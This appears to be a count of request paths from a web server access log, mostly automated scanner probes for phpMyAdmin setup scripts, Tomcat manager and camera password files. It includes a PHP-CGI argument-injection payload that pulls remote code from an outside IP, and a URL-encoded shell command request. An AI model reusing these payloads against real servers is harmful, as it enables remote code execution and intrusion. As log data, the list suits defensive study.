      1 /:8080/admin/mysql/scripts/setup.php
      1 /:8080/admin/phpmyadmin/scripts/setup.php
      1 /:8080/admin/pma/scripts/setup.php
      1 /:8080/admin/scripts/setup.php
      1 /:8080/admin/sql/scripts/setup.php
      1 /:8080/blog/phpmyadmin/scripts/setup.php
      1 /:8080/database/sql/scripts/setup.php
      1 /:8080/dbadmin/scripts/setup.php
      1 /:8080/db/scripts/setup.php
      1 /:8080/myadmin/scripts/setup.php
      1 /:8080/mysql/scripts/setup.php
      1 /:8080/phpadmin/scripts/setup.php
      1 /:8080/phpMyAdmin2/scripts/setup.php
      1 /:8080/phpmyadmin/scripts/setup.php
      1 /:8080/php/scripts/setup.php
      1 /:8080/pma/scripts/setup.php
      1 /:8080/scripts/setup.php
      1 /:8080/web/phpmyadmin/scripts/setup.php
      1 //administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
      1 //admin/mysql/scripts/setup.php
      1 //admin/phpmyadmin/scripts/setup.php
      1 //admin/pma/scripts/setup.php
      1 //admin/scripts/setup.php
      1 //admin/sql/scripts/setup.php
      1 //admn/scripts/setup.php
      1 //apache-default/phpmyadmin/scripts/setup.php
      1 //database/sql/scripts/setup.php
      1 //dbadmin/scripts/setup.php
      1 //db/scripts/setup.php
      1 //forum/phpmyadmin/scripts/setup.php
      1 //htdocs/scripts/setup.php
      1 //httpdocs/scripts/setup.php
      1 /manager/html
      1 /maque66959401/index.jsp
      1 //myadmin/scripts/setup.php
      1 //mysql/scripts/setup.php
      1 //phpadmin/scripts/setup.php
      1 //phpMyAdmin2/scripts/setup.php
      1 //phpmyadmin/scripts/setup.php
      1 //pma/scripts/setup.php
      1 /redirect.php
      1 /script/live.js
      1 //scripts/setup.php
      1 /shell?%75%6E%61%6D%65%20%2D%61
      1 /style.css
      1 /system.ini?loginuse&loginpas
      1 //web/phpmyadmin/scripts/setup.php
      1 //websql/scripts/setup.php
      1 /x
      1 //xampp/phpmyadmin/scripts/setup.php
      2 /:8080/php/phpmyadmin/scripts/setup.php
      2 //blog/phpmyadmin/scripts/setup.php
      2 http://180.163.113.82/check_proxy
      2 /muieblackcat
      2 //php/scripts/setup.php
      2 /recordings/
      3 /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp://191.96.249.97/ok.txt+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
      3 /current_config/Account1
      3 /ok.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
      3 //php/phpmyadmin/scripts/setup.php
      3 /sitemap.xml
      4 /meta-release-lts
      4 /phpmyadmin
      5 /current_config/passwd
      6 http://httpheader.net/
      6 /robots.txt
     13 /favicon.ico
     13 /phpmyadmin/scripts/setup.php
    230 /
